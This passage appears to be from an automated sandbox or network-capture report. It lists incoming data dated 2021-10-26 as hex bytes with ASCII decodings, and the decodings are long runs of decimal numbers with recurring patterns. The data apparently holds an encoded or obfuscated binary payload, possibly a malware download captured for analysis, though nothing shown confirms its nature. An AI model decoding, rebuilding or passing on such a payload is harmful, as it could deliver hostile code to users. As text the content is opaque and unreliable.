                    2021-10-26 16:59:17 UTC72INData Raw: 31 30 39 20 39 39 20 32 20 35 36 20 35 30 20 31 20 38 34 20 31 31 34 20 31 31 37 20 31 31 20 31 31 32 20 35 30 20 33 33 20 34 39 20 35 30 20 31 32 34 20 35 35 20 31 31 37 20 31 30 39 20 31 31 38 20 34 33 20 32 39 20 32 31 20 31 36 20 34 32 20 34 39 20 31 31 37 20 31 30 39 20 31 31 36 20 33 37 20 34 30 20 34 33 20 34 36 20 32 31 37 20 30 20 31 31 37 20 31 30 39 20 31 31 33 20 34 33 20 32 39 20 34 32 20 31 36 20 38 33 20 31 30 30 20 31 31 39 20 32 32 35 20 35 36 20 35 30 20 34 38 20 35 31 20 31 34 38 20 38 33 20 31 30 31 20 31 31 35 20 32 30 37 20 31 31 39 20 32 36 20 31 33 34 20 35 30 20 35 34 20 38 32 20 38 38 20 31 32 37 20 37 30 20 31 36 37 20 35 37 20 32 37 20 32 31 32 20 35 34 20 37 31 20 36 36 20 31 32 35 20 31 30 39 20 37 32 20 35 30 20 34 38 20 35
                    Data Ascii: 109 99 2 56 50 1 84 114 117 11 112 50 33 49 50 124 55 117 109 118 43 29 21 16 42 49 117 109 116 37 40 43 46 217 0 117 109 113 43 29 42 16 83 100 119 225 56 50 48 51 148 83 101 115 207 119 26 134 50 54 82 88 127 70 167 57 27 212 54 71 66 125 109 72 50 48 5
                    2021-10-26 16:59:17 UTC76INData Raw: 32 20 32 33 30 20 31 31 36 20 31 31 34 20 31 31 37 20 31 31 31 20 38 38 20 31 31 36 20 34 38 20 35 30 20 36 30 20 31 32 34 20 31 34 39 20 31 31 37 20 31 30 39 20 31 31 38 20 32 32 36 20 34 34 20 35 30 20 35 34 20 38 36 20 39 30 20 35 31 20 31 30 39 20 31 31 32 20 35 36 20 32 34 20 32 31 33 20 35 34 20 38 34 20 31 31 36 20 31 36 35 20 31 31 39 20 31 31 32 20 35 30 20 35 30 20 32 36 20 31 31 32 20 38 34 20 31 31 34 20 31 32 37 20 36 39 20 31 35 31 20 35 30 20 34 38 20 35 32 20 33 30 20 31 36 32 20 31 31 34 20 31 31 37 20 31 30 37 20 38 38 20 31 39 34 20 34 38 20 35 30 20 34 38 20 31 32 34 20 31 35 37 20 31 31 37 20 31 30 39 20 31 31 38 20 38 33 20 32 34 20 32 32 30 20 35 34 20 38 34 20 31 31 36 20 39 35 20 31 30 39 20 31 31 32 20 34 39 20 30 20 35 36 20 35
                    Data Ascii: 2 230 116 114 117 111 88 116 48 50 60 124 149 117 109 118 226 44 50 54 86 90 51 109 112 56 24 213 54 84 116 165 119 112 50 50 26 112 84 114 127 69 151 50 48 52 30 162 114 117 107 88 194 48 50 48 124 157 117 109 118 83 24 220 54 84 116 95 109 112 49 0 56 5
                    2021-10-26 16:59:17 UTC80INData Raw: 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 34 20 32 36 20 31 31 33 20 35 30 20 35 34 20 39 34 20 31 31 32 20 31 31 38 20 31 31 33 20 39 33 20 34 39 20 32 32 20 32 30 20 32 38 20 34 31 20 34 32 20 31 31 37 20 31 30 39 20 31 31 36 20 32 35 20 32 30 30 20 35 30 20 35 34 20 38 34 20 31 31 33 20 36 39 20 31 30 33 20 31 31 32 20 32 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 34 20 34 33 20 34 36 20 33 31 20 34 36 20 31 31 34 20 39 20 34 35 20 31 30 39 20 31 31 32 20 35 34 20 35 31 20 34 31 20 34 35 20 31 32 31 20 39 38 20 38 33 20 31 30 35 20 31 30 38 20 34 30 20 32 39 20 36 33 20 31 36 20 31 32 34 20 31 39 33 20 31 31 37 20 31 30 39 20 31 31 38 20 32 34 20 32 32 20 32 35 20 32 30 38 20 31 31 34 20 38 39 20
                    Data Ascii: 4 84 114 117 109 114 26 113 50 54 94 112 118 113 93 49 22 20 28 41 42 117 109 116 25 200 50 54 84 113 69 103 112 20 48 50 54 84 114 117 109 114 43 46 31 46 114 9 45 109 112 54 51 41 45 121 98 83 105 108 40 29 63 16 124 193 117 109 118 24 22 25 208 114 89
                    2021-10-26 16:59:17 UTC84INData Raw: 38 32 20 37 20 31 34 36 20 31 34 33 20 36 31 20 31 31 31 20 31 38 20 31 37 38 20 37 38 20 31 31 34 20 31 31 37 20 31 32 20 32 34 30 20 31 31 31 20 34 38 20 35 30 20 35 30 20 34 32 20 31 39 20 31 31 37 20 31 30 39 20 31 31 36 20 34 35 20 31 39 33 20 38 34 20 38 33 20 35 30 20 32 30 20 31 36 20 31 31 20 32 31 20 38 34 20 38 35 20 31 30 39 20 32 37 20 37 30 20 38 32 20 32 30 37 20 31 39 38 20 31 31 32 20 35 30 20 31 37 36 20 31 31 31 20 35 34 20 38 34 20 31 31 38 20 39 34 20 31 30 37 20 31 34 20 31 30 39 20 34 38 20 35 30 20 35 30 20 39 35 20 31 32 20 34 30 20 31 30 39 20 31 31 32 20 35 34 20 31 36 20 31 33 36 20 31 35 37 20 38 34 20 31 31 34 20 37 30 20 37 31 20 31 30 35 20 31 39 31 20 31 39 20 35 30 20 35 34 20 38 35 20 39 37 20 31 32 33 20 31 32 34 20 31
                    Data Ascii: 82 7 146 143 61 111 18 178 78 114 117 12 240 111 48 50 50 42 19 117 109 116 45 193 84 83 50 20 16 11 21 84 85 109 27 70 82 207 198 112 50 176 111 54 84 118 94 107 14 109 48 50 50 95 12 40 109 112 54 16 136 157 84 114 70 71 105 191 19 50 54 85 97 123 124 1
                    2021-10-26 16:59:17 UTC88INData Raw: 20 35 30 20 34 38 20 35 30 20 38 39 20 38 34 20 31 31 34 20 31 30 30 20 31 31 31 20 31 31 20 38 30 20 34 38 20 35 30 20 35 30 20 37 38 20 39 35 20 31 32 30 20 37 35 20 31 31 34 20 33 38 20 33 38 20 33 30 20 36 30 20 31 31 34 20 38 34 20 31 31 35 20 36 35 20 39 38 20 32 35 20 35 38 20 35 36 20 32 39 20 31 36 35 20 31 35 20 32 33 20 31 30 39 20 31 31 32 20 35 34 20 32 37 20 31 39 35 20 34 38 20 35 39 20 31 31 20 31 31 37 20 31 30 39 20 31 32 32 20 34 38 20 33 36 20 34 37 20 32 37 20 38 37 20 38 34 20 38 33 20 37 31 20 31 33 20 38 31 20 34 38 20 35 30 20 35 30 20 31 32 37 20 31 33 38 20 31 31 37 20 31 30 39 20 31 31 32 20 33 33 20 30 20 35 32 20 35 34 20 34 39 20 31 31 34 20 31 31 37 20 31 30 39 20 30 20 35 30 20 34 38 20 33 35 20 35 33 20 36 36 20 39 33 20
                    Data Ascii: 50 48 50 89 84 114 100 111 11 80 48 50 50 78 95 120 75 114 38 38 30 60 114 84 115 65 98 25 58 56 29 165 15 23 109 112 54 27 195 48 59 11 117 109 122 48 36 47 27 87 84 83 71 13 81 48 50 50 127 138 117 109 112 33 0 52 54 49 114 117 109 0 50 48 35 53 66 93
                    2021-10-26 16:59:17 UTC92INData Raw: 20 35 34 20 38 32 20 32 39 20 34 20 31 30 38 20 31 31 32 20 35 32 20 35 34 20 33 38 20 32 30 30 20 38 32 20 32 32 33 20 31 31 37 20 31 30 39 20 31 31 38 20 36 35 20 32 34 31 20 35 31 20 35 34 20 38 32 20 32 39 20 32 34 20 31 30 38 20 31 31 32 20 35 32 20 35 34 20 33 38 20 32 30 30 20 38 32 20 32 32 31 20 31 31 37 20 31 30 39 20 31 31 38 20 36 35 20 32 34 39 20 35 31 20 35 34 20 38 32 20 32 39 20 31 32 20 31 30 38 20 31 31 32 20 35 32 20 35 34 20 32 36 20 31 36 39 20 38 34 20 31 31 34 20 31 31 35 20 36 39 20 37 30 20 35 31 20 34 38 20 35 32 20 38 39 20 31 39 35 20 31 31 35 20 31 31 37 20 31 30 37 20 39 30 20 34 39 20 30 20 35 39 20 35 34 20 36 39 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 33 30 20 31 31 39 20 31 31 35 20
                    Data Ascii: 54 82 29 4 108 112 52 54 38 200 82 223 117 109 118 65 241 51 54 82 29 24 108 112 52 54 38 200 82 221 117 109 118 65 249 51 54 82 29 12 108 112 52 54 26 169 84 114 115 69 70 51 48 52 89 195 115 117 107 90 49 0 59 54 69 114 117 109 112 50 48 50 30 119 115
                    2021-10-26 16:59:17 UTC95INData Raw: 20 34 31 20 37 31 20 38 32 20 32 20 37 31 20 31 36 30 20 34 34 20 32 34 20 32 30 35 20 35 34 20 38 34 20 31 31 36 20 32 31 35 20 31 30 37 20 31 31 31 20 33 38 20 31 36 20 38 33 20 32 38 20 31 33 32 20 31 30 38 20 39 33 20 31 34 36 20 31 31 32 20 35 30 20 35 34 20 31 34 34 20 34 38 20 37 35 20 31 30 33 20 38 35 20 36 20 39 30 20 32 32 36 20 34 36 20 32 36 20 32 30 31 20 38 34 20 31 31 34 20 31 31 35 20 32 30 37 20 31 31 38 20 34 35 20 33 38 20 31 38 20 33 35 20 31 32 36 20 31 36 32 20 31 30 37 20 36 39 20 31 34 33 20 35 30 20 34 38 20 35 32 20 31 34 38 20 38 32 20 32 34 32 20 32 34 20 31 30 39 20 31 31 32 20 35 34 20 32 36 20 35 36 20 31 34 20 31 36 37 20 31 34 33 20 31 33 38 20 31 34 36 20 32 34 30 20 38 39 20 34 38 20 35 30 20 35 30 20 31 30 38 20 37 37
                    Data Ascii: 41 71 82 2 71 160 44 24 205 54 84 116 215 107 111 38 16 83 28 132 108 93 146 112 50 54 144 48 75 103 85 6 90 226 46 26 201 84 114 115 207 118 45 38 18 35 126 162 107 69 143 50 48 52 148 82 242 24 109 112 54 26 56 14 167 143 138 146 240 89 48 50 50 108 77
                    2021-10-26 16:59:17 UTC100INData Raw: 38 34 20 31 30 35 20 39 33 20 34 33 20 31 31 32 20 35 30 20 35 38 20 34 32 20 38 39 20 35 37 20 31 31 35 20 31 31 37 20 31 30 33 20 31 34 20 36 38 20 34 38 20 35 30 20 35 30 20 31 33 32 20 38 31 20 31 31 37 20 31 30 39 20 31 31 33 20 32 36 20 31 31 38 20 35 30 20 35 34 20 39 34 20 31 30 37 20 32 36 20 30 20 31 31 33 20 35 30 20 35 38 20 37 36 20 36 34 20 38 34 20 31 31 34 20 31 31 33 20 31 38 39 20 31 31 30 20 35 30 20 34 38 20 34 31 20 33 30 20 31 38 20 31 31 34 20 31 31 37 20 31 30 33 20 31 30 36 20 39 33 20 39 33 20 35 31 20 35 34 20 39 34 20 31 32 20 33 20 31 30 39 20 31 31 32 20 35 34 20 32 32 34 20 31 20 35 34 20 38 34 20 31 31 35 20 39 33 20 34 33 20 31 31 32 20 35 30 20 35 38 20 34 31 20 38 39 20 35 37 20 31 31 35 20 31 31 37 20 31 30 33 20 31 34
                    Data Ascii: 84 105 93 43 112 50 58 42 89 57 115 117 103 14 68 48 50 50 132 81 117 109 113 26 118 50 54 94 107 26 0 113 50 58 76 64 84 114 113 189 110 50 48 41 30 18 114 117 103 106 93 93 51 54 94 12 3 109 112 54 224 1 54 84 115 93 43 112 50 58 41 89 57 115 117 103 14
                    2021-10-26 16:59:17 UTC104INData Raw: 20 31 32 30 20 37 37 20 31 30 30 20 31 31 34 20 35 30 20 34 38 20 37 36 20 36 39 20 38 34 20 31 31 34 20 31 31 33 20 39 39 20 31 31 36 20 33 35 20 35 33 20 31 36 38 20 37 39 20 33 31 20 31 31 34 20 31 31 37 20 31 30 38 20 31 20 31 32 31 20 34 38 20 35 30 20 35 35 20 35 39 20 32 34 32 20 31 31 36 20 31 30 39 20 31 32 32 20 31 30 20 32 31 39 20 35 31 20 35 34 20 38 34 20 31 32 20 36 20 31 30 39 20 31 31 32 20 35 34 20 36 32 20 35 34 20 33 39 20 38 31 20 32 33 32 20 31 32 20 31 39 36 20 31 31 32 20 35 30 20 34 39 20 36 37 20 31 35 39 20 38 34 20 31 31 34 20 31 31 36 20 32 20 32 34 31 20 35 31 20 34 38 20 35 36 20 31 34 20 31 35 33 20 31 31 35 20 31 31 37 20 31 30 39 20 31 34 20 36 35 20 34 38 20 35 30 20 35 30 20 39 30 20 31 31 38 20 31 30 30 20 31 30 34 20
                    Data Ascii: 120 77 100 114 50 48 76 69 84 114 113 99 116 35 53 168 79 31 114 117 108 1 121 48 50 55 59 242 116 109 122 10 219 51 54 84 12 6 109 112 54 62 54 39 81 232 12 196 112 50 49 67 159 84 114 116 2 241 51 48 56 14 153 115 117 109 14 65 48 50 50 90 118 100 104
                    2021-10-26 16:59:17 UTC108INData Raw: 20 38 30 20 31 32 20 34 20 31 30 39 20 31 31 32 20 35 34 20 39 35 20 32 35 31 20 35 34 20 38 34 20 31 32 30 20 32 36 20 31 36 37 20 31 31 32 20 35 30 20 35 38 20 39 33 20 31 30 39 20 38 34 20 31 31 34 20 31 32 37 20 38 35 20 32 31 32 20 34 38 20 34 38 20 35 30 20 37 32 20 33 33 20 31 31 34 20 31 31 37 20 31 30 35 20 31 34 20 36 37 20 34 38 20 35 30 20 35 30 20 35 39 20 32 32 35 20 31 31 36 20 31 30 39 20 31 32 32 20 31 39 30 20 31 39 20 35 30 20 35 34 20 38 35 20 32 39 20 34 36 20 31 30 39 20 31 31 32 20 35 36 20 38 20 31 38 30 20 35 32 20 38 34 20 31 31 34 20 31 31 20 32 34 20 31 31 32 20 35 30 20 35 32 20 37 36 20 37 31 20 38 34 20 31 31 34 20 31 31 33 20 32 20 32 32 38 20 35 31 20 34 38 20 35 36 20 38 39 20 31 39 33 20 31 31 35 20 31 31 37 20 31 30 33
                    Data Ascii: 80 12 4 109 112 54 95 251 54 84 120 26 167 112 50 58 93 109 84 114 127 85 212 48 48 50 72 33 114 117 105 14 67 48 50 50 59 225 116 109 122 190 19 50 54 85 29 46 109 112 56 8 180 52 84 114 11 24 112 50 52 76 71 84 114 113 2 228 51 48 56 89 193 115 117 103
                    2021-10-26 16:59:17 UTC112INData Raw: 35 30 20 35 38 20 33 35 20 34 38 20 35 39 20 32 31 39 20 31 31 36 20 31 30 39 20 31 32 32 20 33 30 20 36 33 20 35 33 20 33 39 20 38 30 20 36 20 31 30 30 20 31 30 39 20 31 31 32 20 35 31 20 37 37 20 34 33 20 35 34 20 38 34 20 31 31 38 20 39 34 20 37 37 20 31 36 30 20 36 31 20 34 38 20 35 30 20 35 35 20 31 32 34 20 35 32 20 31 31 37 20 31 30 39 20 31 32 32 20 33 35 20 35 34 20 39 33 20 31 35 39 20 38 35 20 31 31 34 20 31 32 37 20 36 35 20 31 32 35 20 35 33 20 33 33 20 35 34 20 36 36 20 39 31 20 31 31 34 20 31 31 37 20 31 30 38 20 31 33 20 34 30 20 34 38 20 35 30 20 35 30 20 36 39 20 31 32 30 20 39 38 20 35 33 20 39 39 20 35 36 20 33 33 20 35 36 20 33 39 20 39 35 20 32 35 32 20 31 39 34 20 39 35 20 32 34 37 20 31 38 20 32 30 33 20 33 30 20 32 33 30 20 37 34
                    Data Ascii: 50 58 35 48 59 219 116 109 122 30 63 53 39 80 6 100 109 112 51 77 43 54 84 118 94 77 160 61 48 50 55 124 52 117 109 122 35 54 93 159 85 114 127 65 125 53 33 54 66 91 114 117 108 13 40 48 50 50 69 120 98 53 99 56 33 56 39 95 252 194 95 247 18 203 30 230 74
                    2021-10-26 16:59:17 UTC116INData Raw: 20 36 34 20 37 31 20 34 38 20 35 30 20 31 38 36 20 32 34 20 31 31 34 20 31 31 37 20 31 30 38 20 38 38 20 39 37 20 34 39 20 35 30 20 34 38 20 34 35 20 36 32 20 31 31 37 20 31 30 39 20 31 31 33 20 36 37 20 31 32 34 20 35 30 20 35 34 20 38 35 20 38 38 20 31 30 32 20 39 33 20 31 31 34 20 35 30 20 32 30 20 35 30 20 35 34 20 38 34 20 31 32 36 20 31 31 37 20 31 30 39 20 39 37 20 31 38 20 37 36 20 32 38 20 32 33 30 20 37 34 20 39 30 20 31 33 38 20 31 30 39 20 31 31 32 20 35 32 20 31 36 20 32 34 36 20 36 33 20 38 34 20 31 31 34 20 32 34 39 20 33 33 20 31 31 32 20 35 30 20 34 39 20 32 36 20 31 30 31 20 38 35 20 31 31 34 20 31 31 35 20 32 30 20 36 30 20 35 30 20 34 38 20 35 31 20 37 31 20 32 34 20 31 31 34 20 31 31 37 20 31 30 38 20 39 30 20 33 33 20 30 20 34 38 20
                    Data Ascii: 64 71 48 50 186 24 114 117 108 88 97 49 50 48 45 62 117 109 113 67 124 50 54 85 88 102 93 114 50 20 50 54 84 126 117 109 97 18 76 28 230 74 90 138 109 112 52 16 246 63 84 114 249 33 112 50 49 26 101 85 114 115 20 60 50 48 51 71 24 114 117 108 90 33 0 48
                    2021-10-26 16:59:17 UTC120INData Raw: 38 36 20 31 30 30 20 39 35 20 31 30 36 20 31 30 33 20 31 30 36 20 34 36 20 33 31 20 35 33 20 31 31 34 20 38 39 20 31 31 38 20 31 30 32 20 39 31 20 35 30 20 35 35 20 35 38 20 37 20 31 37 38 20 31 30 31 20 39 35 20 31 32 36 20 36 34 20 34 39 20 34 38 20 31 31 35 20 35 34 20 38 34 20 31 31 34 20 32 35 35 20 31 30 39 20 31 31 32 20 33 35 20 35 30 20 32 36 20 31 30 36 20 38 35 20 31 31 34 20 31 31 35 20 31 31 39 20 39 33 20 33 34 20 32 32 20 35 33 20 38 39 20 35 35 20 31 31 35 20 31 31 37 20 31 30 33 20 38 30 20 35 30 20 33 32 20 35 30 20 35 34 20 31 30 31 20 39 30 20 39 34 20 31 31 30 20 31 32 33 20 32 35 20 32 32 32 20 35 33 20 32 32 20 31 36 39 20 31 32 35 20 31 31 37 20 31 30 39 20 33 31 20 31 34 31 20 34 39 20 35 30 20 36 30 20 31 31 36 20 31 38 36 20 36
                    Data Ascii: 86 100 95 106 103 106 46 31 53 114 89 118 102 91 50 55 58 7 178 101 95 126 64 49 48 115 54 84 114 255 109 112 35 50 26 106 85 114 115 119 93 34 22 53 89 55 115 117 103 80 50 32 50 54 101 90 94 110 123 25 222 53 22 169 125 117 109 31 141 49 50 60 116 186 6
                    2021-10-26 16:59:17 UTC124INData Raw: 20 34 39 20 31 36 20 31 31 34 20 38 38 20 38 20 32 34 39 20 31 31 32 20 35 30 20 35 32 20 32 35 20 32 30 36 20 38 34 20 31 31 33 20 36 39 20 31 30 30 20 31 31 32 20 34 35 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 34 20 34 38 20 37 35 20 31 36 36 20 35 34 20 38 34 20 31 31 38 20 31 31 38 20 36 39 20 32 34 36 20 35 30 20 34 38 20 35 36 20 36 36 20 31 30 36 20 31 31 34 20 31 31 37 20 31 31 31 20 31 30 31 20 33 31 20 35 31 20 32 30 20 31 36 20 31 32 36 20 31 35 20 32 32 35 20 31 30 39 20 31 31 32 20 35 34 20 32 37 20 32 30 32 20 35 34 20 38 37 20 36 36 20 31 32 34 20 31 30 39 20 31 31 31 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 31 31 20 31 31 34 20 37 33 20 31 36 35 20 35 30 20 35 34 20
                    Data Ascii: 49 16 114 88 8 249 112 50 52 25 206 84 113 69 100 112 45 48 50 54 84 114 117 109 114 48 75 166 54 84 118 118 69 246 50 48 56 66 106 114 117 111 101 31 51 20 16 126 15 225 109 112 54 27 202 54 87 66 124 109 111 50 48 50 54 84 114 117 111 114 73 165 50 54
                    2021-10-26 16:59:17 UTC127INData Raw: 39 39 20 31 31 39 20 31 32 32 20 31 30 38 20 33 31 20 35 35 20 32 30 20 37 37 20 32 30 33 20 31 31 34 20 31 31 37 20 31 30 35 20 39 30 20 32 30 20 32 37 20 31 39 37 20 35 34 20 38 37 20 36 36 20 31 32 34 20 31 30 39 20 31 32 37 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 31 31 20 31 31 35 20 33 37 20 32 39 20 34 39 20 31 36 20 31 31 34 20 38 38 20 38 20 32 34 32 20 31 31 32 20 35 30 20 35 32 20 32 35 20 32 30 36 20 38 34 20 39 37 20 36 39 20 31 31 30 20 31 31 32 20 36 31 20 34 38 20 35 30 20 35 34 20 38 38 20 31 31 34 20 31 31 37 20 31 32 34 20 31 31 34 20 34 31 20 33 39 20 33 31 20 34 39 20 31 31 34 20 39 20 32 31 33 20 31 30 39 20 31 31 32 20 35 34 20 32 36 20 32 30 20 32 39 20 31 36 33 20 31 31 34 20 31 31 38 20 39 33 20
                    Data Ascii: 99 119 122 108 31 55 20 77 203 114 117 105 90 20 27 197 54 87 66 124 109 127 50 48 50 54 84 114 117 111 115 37 29 49 16 114 88 8 242 112 50 52 25 206 84 97 69 110 112 61 48 50 54 88 114 117 124 114 41 39 31 49 114 9 213 109 112 54 26 20 29 163 114 118 93
                    2021-10-26 16:59:17 UTC132INData Raw: 39 37 20 35 34 20 31 39 30 20 31 33 33 20 34 20 31 38 31 20 31 31 36 20 32 35 31 20 32 31 38 20 31 30 32 20 31 20 34 32 20 34 39 20 33 30 20 31 33 31 20 31 31 35 20 31 31 37 20 31 30 33 20 33 31 20 32 33 34 20 34 39 20 35 30 20 36 30 20 39 34 20 38 39 20 31 32 31 20 31 31 30 20 38 38 20 32 32 39 20 34 39 20 35 30 20 36 30 20 35 39 20 31 37 30 20 31 31 36 20 31 30 39 20 31 32 32 20 35 36 20 35 30 20 34 39 20 35 30 20 38 32 20 32 39 20 32 33 36 20 31 30 38 20 31 31 32 20 35 32 20 32 33 38 20 32 37 20 31 39 20 31 32 34 20 36 32 20 31 31 37 20 31 30 39 20 31 32 32 20 36 32 20 35 30 20 37 33 20 31 37 33 20 38 34 20 31 31 34 20 31 31 33 20 31 32 36 20 31 31 37 20 33 35 20 35 33 20 33 30 20 36 33 20 36 39 20 31 31 39 20 31 31 39 20 31 30 31 20 33 31 20 32 35 34
                    Data Ascii: 97 54 190 133 4 181 116 251 218 102 1 42 49 30 131 115 117 103 31 234 49 50 60 94 89 121 110 88 229 49 50 60 59 170 116 109 122 56 50 49 50 82 29 236 108 112 52 238 27 19 124 62 117 109 122 62 50 73 173 84 114 113 126 117 35 53 30 63 69 119 119 101 31 254
                    2021-10-26 16:59:17 UTC136INData Raw: 20 31 38 38 20 31 33 35 20 31 20 31 36 20 36 37 20 31 31 30 20 38 38 20 39 38 20 38 36 20 34 38 20 37 35 20 31 37 31 20 35 34 20 38 34 20 31 31 38 20 31 30 32 20 31 30 34 20 39 37 20 35 35 20 32 38 20 33 39 20 32 39 20 38 37 20 31 32 30 20 39 34 20 31 33 30 20 39 37 20 35 35 20 35 30 20 34 38 20 37 37 20 32 32 35 20 31 31 34 20 31 31 37 20 31 30 35 20 32 35 34 20 31 33 33 20 39 35 20 31 33 31 20 35 35 20 38 34 20 31 31 36 20 31 31 39 20 32 32 20 32 30 32 20 35 30 20 34 38 20 35 34 20 33 37 20 38 32 20 39 39 20 31 31 35 20 36 39 20 32 34 38 20 35 30 20 34 38 20 35 36 20 33 39 20 38 32 20 39 30 20 32 35 32 20 31 30 39 20 31 31 32 20 35 36 20 35 30 20 37 33 20 31 34 31 20 38 34 20 31 31 34 20 31 31 33 20 32 20 31 34 39 20 35 31 20 34 38 20 35 36 20 33 32 20
                    Data Ascii: 188 135 1 16 67 110 88 98 86 48 75 171 54 84 118 102 104 97 55 28 39 29 87 120 94 130 97 55 50 48 77 225 114 117 105 254 133 95 131 55 84 116 119 22 202 50 48 54 37 82 99 115 69 248 50 48 56 39 82 90 252 109 112 56 50 73 141 84 114 113 2 149 51 48 56 32
                    2021-10-26 16:59:17 UTC140INData Raw: 31 31 34 20 34 38 20 37 35 20 31 35 39 20 35 34 20 38 34 20 31 31 38 20 31 31 39 20 32 32 20 32 32 33 20 35 30 20 34 38 20 35 34 20 38 39 20 32 30 33 20 31 31 35 20 31 31 37 20 31 30 37 20 39 30 20 34 38 20 34 39 20 33 34 20 35 34 20 38 34 20 31 31 32 20 31 31 37 20 38 34 20 31 31 32 20 34 30 20 39 39 20 35 30 20 34 39 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 39 39 20 32 20 35 32 20 35 30 20 32 32 20 38 35 20 31 31 34 20 31 31 37 20 32 34 30 20 31 31 32 20 35 30 20 33 33 20 34 38 20 38 39 20 32 31 39 20 31 31 35 20 31 31 37 20 31 30 37 20 39 33 20 35 31 20 32 36 20 34 38 20 37 37 20 32 34 33 20 31 31 34 20 31 31 37 20 31 30 35 20 31 30 39 20 33 31 20 31 39 20 32 30 20 35 32 20 34 37 20 32 31 38 20 31 31 37 20 31 30 39 20 31 31 36 20 34 30 20 32 39
                    Data Ascii: 114 48 75 159 54 84 118 119 22 223 50 48 54 89 203 115 117 107 90 48 49 34 54 84 112 117 84 112 40 99 50 49 84 114 117 109 99 2 52 50 22 85 114 117 240 112 50 33 48 89 219 115 117 107 93 51 26 48 77 243 114 117 105 109 31 19 20 52 47 218 117 109 116 40 29
                    2021-10-26 16:59:17 UTC144INData Raw: 31 31 34 20 31 31 37 20 32 33 32 20 32 30 32 20 38 31 20 32 30 37 20 32 31 31 20 32 30 31 20 31 34 38 20 32 34 39 20 35 36 20 32 31 30 20 32 31 31 20 39 31 20 31 35 39 20 34 20 31 34 39 20 31 37 20 31 32 37 20 32 31 35 20 33 37 20 31 38 20 31 38 39 20 31 35 38 20 31 39 33 20 31 34 32 20 32 31 36 20 31 36 30 20 32 37 20 31 34 32 20 31 38 31 20 31 37 39 20 38 39 20 31 33 35 20 31 39 36 20 32 31 37 20 34 33 20 39 32 20 31 37 39 20 34 31 20 32 33 34 20 33 31 20 32 34 35 20 32 33 34 20 31 34 36 20 31 39 34 20 31 33 34 20 37 36 20 31 37 37 20 37 20 31 32 33 20 31 37 32 20 31 32 33 20 32 33 35 20 32 30 39 20 31 35 38 20 35 33 20 39 30 20 31 31 31 20 37 32 20 32 38 20 32 30 34 20 31 30 39 20 38 20 31 39 20 37 35 20 32 32 31 20 31 30 33 20 35 32 20 31 34 35 20 32
                    Data Ascii: 114 117 232 202 81 207 211 201 148 249 56 210 211 91 159 4 149 17 127 215 37 18 189 158 193 142 216 160 27 142 181 179 89 135 196 217 43 92 179 41 234 31 245 234 146 194 134 76 177 7 123 172 123 235 209 158 53 90 111 72 28 204 109 8 19 75 221 103 52 145 2
                    2021-10-26 16:59:17 UTC148INData Raw: 30 37 20 33 38 20 31 30 32 20 31 34 20 32 34 20 31 32 33 20 31 33 37 20 32 34 37 20 38 31 20 34 32 20 33 37 20 31 33 34 20 31 35 30 20 31 33 30 20 31 33 37 20 34 38 20 31 39 31 20 31 37 35 20 31 38 33 20 31 38 30 20 32 31 37 20 33 31 20 31 34 38 20 30 20 31 30 36 20 37 39 20 31 38 37 20 31 33 36 20 37 33 20 32 33 39 20 31 37 34 20 37 35 20 31 39 36 20 34 38 20 35 20 31 35 37 20 31 33 35 20 35 36 20 39 37 20 32 33 33 20 31 32 33 20 31 32 31 20 37 36 20 32 39 20 32 30 35 20 32 31 34 20 32 35 30 20 32 31 36 20 34 39 20 38 37 20 33 30 20 32 33 35 20 31 32 38 20 32 32 33 20 33 36 20 31 39 34 20 32 34 32 20 32 30 20 31 38 31 20 31 30 38 20 32 33 32 20 32 35 34 20 33 35 20 39 33 20 31 37 37 20 31 36 32 20 31 38 34 20 31 39 20 32 31 33 20 31 30 20 31 38 31 20 34
                    Data Ascii: 07 38 102 14 24 123 137 247 81 42 37 134 150 130 137 48 191 175 183 180 217 31 148 0 106 79 187 136 73 239 174 75 196 48 5 157 135 56 97 233 123 121 76 29 205 214 250 216 49 87 30 235 128 223 36 194 242 20 181 108 232 254 35 93 177 162 184 19 213 10 181 4
                    2021-10-26 16:59:17 UTC152INData Raw: 34 36 20 39 32 20 37 20 31 34 37 20 35 32 20 32 34 34 20 37 37 20 32 31 35 20 32 30 39 20 39 34 20 35 30 20 31 32 20 37 32 20 34 34 20 31 37 34 20 39 20 37 36 20 32 30 36 20 39 34 20 31 20 31 35 35 20 31 34 30 20 31 35 34 20 35 31 20 34 36 20 31 35 37 20 32 32 38 20 36 34 20 38 37 20 31 36 32 20 31 33 31 20 35 32 20 31 34 31 20 31 34 37 20 36 32 20 33 31 20 39 32 20 31 38 35 20 36 37 20 31 35 30 20 34 39 20 32 31 30 20 35 33 20 32 31 39 20 34 32 20 34 30 20 31 35 39 20 32 30 31 20 33 37 20 31 39 31 20 31 31 38 20 31 34 33 20 31 34 35 20 32 32 34 20 36 38 20 32 32 39 20 32 33 30 20 39 33 20 31 38 31 20 31 31 38 20 31 34 33 20 31 34 35 20 31 38 35 20 31 39 38 20 31 35 35 20 32 31 36 20 31 36 39 20 31 30 35 20 32 33 33 20 31 31 36 20 31 34 31 20 31 34 39 20
                    Data Ascii: 46 92 7 147 52 244 77 215 209 94 50 12 72 44 174 9 76 206 94 1 155 140 154 51 46 157 228 64 87 162 131 52 141 147 62 31 92 185 67 150 49 210 53 219 42 40 159 201 37 191 118 143 145 224 68 229 230 93 181 118 143 145 185 198 155 216 169 105 233 116 141 149
